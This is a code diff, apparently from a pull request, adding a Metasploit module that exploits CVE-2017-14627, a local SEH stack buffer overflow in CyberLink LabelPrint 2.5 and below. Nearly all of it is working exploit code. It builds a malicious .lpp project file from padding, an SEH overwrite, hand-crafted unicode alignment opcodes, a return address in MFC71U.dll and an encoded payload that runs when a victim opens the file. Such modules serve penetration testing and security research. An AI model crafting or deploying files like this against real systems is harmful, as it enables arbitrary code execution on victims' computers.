Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

Add CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)

modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb

@@ -0,0 +1,155 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Seh
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
+      'Description'    => %q{
+       This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
+       The vulnerability is triggered when opening a .lpp project file containing overly long string characters
+       via open file menu. This results in overwriting a structured exception handler record and take over the
+       application. This module has been tested on Windows 7x64.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'modpr0be <tom@spentera.id>',       # initial discovery and metasploit module
+          'f3ci <marie@spentera.id>'            # unicode kungfu
+        ],
+      'References'      =>
+        [
+          [ 'CVE', '2017-14627' ],
+          [ 'EDB', '42777' ]
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'seh',
+          'DisablePayloadHandler' => 'true'
+        },
+      'Platform'        => 'win',
+      'Targets'         =>
+        [
+          ['CyberLink LabelPrint <= 2.5 (Win 7x64)', { 'Ret' => "\x2c\x44", 'Offset' => 790 } ]
+        ],
+      'Payload'         =>
+        {
+          'Space'       => 15000,
+          'BadChars'    => "\x00",    #badchars starts from 80 until the rest of it.
+          'DisableNops' => true
+        },
+      'DisclosureDate'  => 'Sep 23 2017',
+      'DefaultTarget'   => 0))
+
+    register_options(
+    [
+      OptString.new('FILENAME', [true, 'The malicious file name', 'msf.lpp'])
+    ])
+  end
+
+  def get_payload(hunter)
+
+    [ 'x86/unicode_mixed' ].each { |name|
+      enc = framework.encoders.create(name)
+      if name =~ /unicode/
+        enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+        hunter = enc.encode(hunter, nil, nil, platform)
+      end
+    }
+
+    return hunter
+  end
+
+  def exploit
+    nop = "\x42"
+    junk = "\x41"              #junk must specifically static, put A as example
+    buffer = ""
+    buffer << junk * target['Offset']
+    buffer << "\x61\x42"       # nseh
+    buffer << target['Ret']    # seh
+
+    #we need to encode the RET address, since C3 is known bad char.
+    #preparing address for the decoded RET
+    buffer << nop              #nop/inc edx
+    buffer << "\x54"           #push esp
+    buffer << nop              #nop/inc edx
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x1B\x01"   #add eax 01001B00 universal
+    buffer << nop              #nop/inc edx
+    buffer << "\x2d\x01\x01"   #sub eax 01001000
+    buffer << nop              #nop/inc edx
+    buffer << "\x50"           #push eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x5c"           #pop esp
+
+    #preparing ret opcode
+    buffer << nop              #nop/inc edx
+    buffer << "\x25\x7e\x7e"   #and eax,7e007e00
+    buffer << nop              #nop/inc edx
+    buffer << "\x25\x01\x01"   #and eax,01000100
+    buffer << nop              #nop/inc edx
+    buffer << "\x35\x7f\x7f"   #xor eax,7f007f00
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x44\x44"   #add eax,44004400
+    buffer << nop              #nop/inc edx
+    buffer << "\x57"           #push edi
+    buffer << nop              #nop/inc edx
+    buffer << "\x50"           #push eax
+    buffer << junk * 857       #depending OS
+
+    #custom venetian to reach shellcode
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x09\x01"   #depending OS
+    buffer << nop              #nop/inc edx
+    buffer << "\x2d\x01\x01"   #add eax, 01000100 #align eax to our buffer
+    buffer << nop              #nop/inc edx
+    buffer << "\x50"           #push eax
+    buffer << nop              #nop/inc edx
+
+    #crafting call esp 0x7c32537b MFC71U.dll
+    buffer << "\x5C"           #pop esp
+    buffer << nop              #nop/inc edx
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x53\x7c"   #add eax 7c005300 part of call esp
+    buffer << nop              #nop/inc edx
+    buffer << "\x50"           #push eax
+    buffer << junk * 104       #depending OS
+    buffer << "\x7b\x32"       #part of call esp
+
+    #preparing for shellcode
+    buffer << nop * 114        #junk
+    buffer << "\x57"           #push edi
+    buffer << nop              #nop/inc edx
+    buffer << "\x58"           #pop eax
+    buffer << nop              #nop/inc edx
+    buffer << "\x05\x0A\x01"   #depending OS
+    buffer << nop              #nop/inc edx
+    buffer << "\x2d\x01\x01"   #sub eax,01000100
+    buffer << nop              #nop/inc edx
+    buffer << get_payload(payload.encoded)
+    buffer << junk * 4090      #fill the rest of buffer, must be added.
+
+    lpp_data = <<-EOS
+    <PROJECT version="1.0.00">
+      <INFORMATION title="" author="" date="1/1/1970" SystemTime="1/1/1970">
+        <TRACK name="#{buffer}" />
+      </INFORMATION>
+    </PROJECT>
+    EOS
+
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
+    file_create(lpp_data)
+  end
+end